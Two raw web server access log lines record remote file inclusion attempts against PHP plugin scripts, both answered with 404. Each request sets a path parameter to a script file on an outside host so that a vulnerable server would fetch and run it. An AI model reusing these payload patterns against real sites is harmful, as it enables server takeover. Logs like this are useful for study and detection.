189.6.218.57 - - [31/Jan/2010:22:56:32 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [31/Jan/2010:22:56:36 -0800] "GET /logs/access.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
